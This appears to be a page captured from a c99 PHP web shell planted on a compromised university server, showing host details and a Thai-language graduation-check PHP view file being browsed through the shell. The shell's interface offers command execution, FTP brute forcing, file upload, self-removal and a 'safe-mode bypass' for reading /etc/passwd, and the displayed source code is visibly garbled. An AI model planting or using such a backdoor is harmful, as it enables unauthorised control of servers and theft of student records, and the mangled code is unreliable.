!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/eregis-13022565/   drwxrwxrwx
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_showExpectGD.php (8.5 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<script language="JavaScript" type="text/JavaScript">
function confirmExpectGD(tm, acY) {
    if(confirm("คุณต้องการประมวลผลการสำเร็จการศึกษา ภาคการศึกษา "+tm+" ปีการศึกษา "+acY+" !!\n\nเมื่อกดปุ่ม OK แล้ว จะทำการประมวลผลทันที โดยที่จะไม่สามารถเปลี่ยนแปลงได้อีก\nถ้ายืนยัน ให้กดปุ่ม OK"))
        return true;
    else
        return false;
}
</script>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
        <td><br>
            <div align="center"><br>
            <?php echo form_open($this->config->item("rg_folder")."graduate/processExpectGD", array("name" => "myform""id" => "myform"));?>
            <table class="szone">
<?php
                
if (!$std) {
?>
                <tr>
                    <td colspan="4" ><b>รหัสนักศึกษา</b>
                    <input type="text" name="stdCode" id="stdCode" value="<?php echo set_value("stdCode");?>" size="15" maxlength="15" class="required-int" />
                    <input type="submit" name="search" value="ค้นหา" onClick="return confirmExpectGD(<?php echo $this->session->userdata('tmId');?>,<?php echo $this->session->userdata('acY');?>)"></span></td>
                </tr>
<?php
                
}
?>
                <tr align="center">
                    <td height="22"><font class="h" /><b><?php echo isset($success_msg) ? $success_msg "";?><b></font></td>
                </tr>
<?php
                
if (isset($stdCode) && $stdCode) {
                    if ((isset(
$flagGD) && $flagGD) || isset($qu_std)) {    // รออนุมัติจบ
                        
$row_std $qu_std->row();
?>
                <tr>
                    <td><table class="szone">
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">รหัสนักศึกษา</b></font></td>
                            <td><?php echo $row_std->stdCode;?></span></td>
                            <td class="coltd_szone">ชื่อ-นามสกุล</span></td>
                            <td><?php echo $row_std->prefixName.$row_std->stdName.' '.$row_std->stdSurname;?></span></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">หลักสูตร</span></td>
                            <td><?php echo $row_std->curName;?></span></td>
                            <td class="coltd_szone">ชั้นปี</span></td>
                            <td><?php echo $row_std->syCode;?></span>
                            <input type="hidden" name="syId" id="syId" value="<?php echo $row_std->stdSyId;?>" size="1" class="input2" /></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">ปีการศึกษา</b></font></td>
                            <td><input type="text" name="acY" id="acY" value="<?php echo $this->session->userdata('acY');?>" size="4" class="input2" /></td>
                            <td class="coltd_szone">ภาคการศึกษา</td>
                            <td><input type="text" name="tmId" id="tmId" value="<?php echo $this->session->userdata('tmId');?>" size="4" class="input2" /></td>
                        </tr>
                    </table></td>
                </tr>
                <tr>
                    <td><br /></td>
                </tr>
                <tr>
                    <td><table class="headCol">
                        <tr>
                            <th><b>หมวดวิชา</th>
                            <th>หน่วยกิตที่ต้องลง</th>
                            <th>หน่วยกิตที่ได้</h>
                            <th>สถานะ</th>
                        </tr>
<?php
                        $i_line 
0;
                        foreach (
$rs as $key => $val) {
                            
$row_cs $rs[$key]['qu_cs']->row();

                            if (
$rs[$key]['level'] == 0) {
?>
                        <tr bgcolor="<?php echo $table_color_even;?>">
                            <td height="22"><font><b>
                            <span onClick="sendPost('hidform',
                            {'stdId':<?php echo $row_std->stdId;?>,
                            'csCdId1':<?php echo $row_cs->csCdId1;?>,
                             'csCdId2':<?php echo $row_cs->csCdId2;?>},
                             '<?php echo site_url($this->config->item('rg_folder').'graduate/showDetailExpectGD');?>',
                             {})" class="hand" ><?php echo $row_cs->cdName;?></span></b></font></td>
                            <td align="center"><font size="1" color="<?php echo $font_color_table;?>"><b><?php echo $row_cs->csCreditTotal;?></b></font></td>
                            <td align="center"><font size="1" color="<?php echo $font_color_table;?>"><b><?php echo $rs[$key]['credit'];?></b></font></td>
                            <td align="center"><font size="1" color="<?php echo $font_color_err;?>"><b><?php echo $rs[$key]['status'];?></b></font></td>
                        </tr>
<?php
                            
} else if ($rs[$key]['level'] == 1) {
                            echo 
"<tr onmouseover=\"bgColor='".$tr_color_even."'\" onmouseout=\"bgColor='".$this->config->item("rg_mouseout")."'\">";

?>
                            <td><img src="<?php echo base_url().$this->config->item("rg_ico3");?>" align="absmiddle" border="0">
                            <font>
                            <span onClick="sendPost('hidform',
                            {'stdId':<?php echo $row_std->stdId;?>,
                             'csCdId1':<?php echo $row_cs->csCdId1;?>,
                             'csCdId2':<?php echo $row_cs->csCdId2;?>},
                             '<?php echo site_url($this->config->item('rg_folder').'stdGraduate/showDetailExpectGD');?>',
                             {})" class="hand" ><?php echo $row_cs->cdName;?></span>
                            </font></td>
                            <td align="center"><font size="1"><?php echo $row_cs->csCreditTotal;?></font></td>
                            <td align="center"><font size="1"><?php echo $rs[$key]['credit'];?></font></td>
                            <td align="center"><font size="1" color="<?php echo $font_color_err;?>"><b><?php echo $rs[$key]['status'];?></b></font></td>
                        </tr>
<?php
                                $i_line
++;
                            }
                        }
?>
                        <tr bgcolor="<?php echo $this->config->item('rg_head_tb_headCol');?>">
                            <td height="22" align="right"><span><b>รวมหน่วยกิต</b></span></td>
                            <td align="center"><span><?php echo $sumCreditTotal;?></span></td>
                            <td align="center"><span><?php echo $sumCreditSatisfy;?></span></td>
                            <td></td>
                        </tr>
                    </table></td>
                </tr>
                <tr>
                    <td height="22"></td>
                </tr>
<?php
                        
if (!$flagChkGr) {
?>
                <tr>
                    <td height="22"><span class="error"><?php echo $msg;?></span></td>
                </tr>
                <tr>
                    <td height="22"></td>
                </tr>
<?php
                        
}

                        if (
$flagGD) {
?>
                <tr>
                    <td height="22" align="center"><span class="error"><b>** รออนุมัติจบ **</b></span></td>
                </tr>
<?php
                        
} else {
?>
                <tr>
                    <td height="22" align="center"><span class="error"><b>** ยังไม่สำเร็จการศึกษา **</b></span></td>
                </tr>
                <tr>
                    <td height="22"></td>
                </tr>
                <tr>
                    <td height="22"><span class="error"><b>สาเหตุของการที่ไม่สำเร็จการศึกษา :</b></span></td>
                </tr>
<?php            
                            $i 
1;
                            if (!
$flagGPA) {
?>
                <tr>
                    <td height="22"><span class="error">(<?php echo $i;?>) คะแนนเฉลี่ยสะสมตลอดหลักสูตรต่ำกว่า <?php echo number_format($qu_cur->row()->curMinGPAX2);?></span></td>
                </tr>
<?php
                                $i
++;
                            }
                        
                            if (!
$flagStY) {
?>
                <tr>
                    <td height="22"><span class="error">(<?php echo $i;?>) จำนวนปีที่เรียนเกิน 2 เท่าของเวลาที่หลักสูตรกำหนด</span></td>
                </tr>
<?php
                                $i
++;
                            }
                        
                            if (!
$flagCrTt) {
?>
                <tr>
                    <td height="22"><span class="error">(<?php echo $i;?>) สอบได้จำนวนหน่วยกิตไม่ครบตามหลักสูตร</span></td>
                </tr>
<?php
                                $i
++;
                            }
                        
                            if (!
$flagEE && $acExitExam == 'Y') {
?>
                <tr>
                    <td height="22"><span class="error">(<?php echo $i;?>) ไม่ผ่านการสอบมาตรฐานวิชาชีพ (Exit-Exam) ของทางสถาบัน</span></td>
                </tr>
<?php
                            
}
                        }    
// end if flagGD
                    
} else {
?>
                <tr>
                    <td align="center"><span class="error">** ไม่ปรากฏรหัสนักศึกษาดังกล่าวในฐานข้อมูล **</span></td>
                </tr>
<?php
                    
}    // end if search
                
}    // end if have stdCode
?>
            </table><?php echo form_close();?></div>
        <br><span class="error"><b>หมายเหตุ : </b>ใช้เมาส์คลิกที่ชื่อหมวดวิชา/กลุ่มวิชาเพื่อดูรายวิชาที่ได้ลงเรียนไปแล้วในหมวดวิชา/กลุ่มวิชานั้น</span></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0133 ]--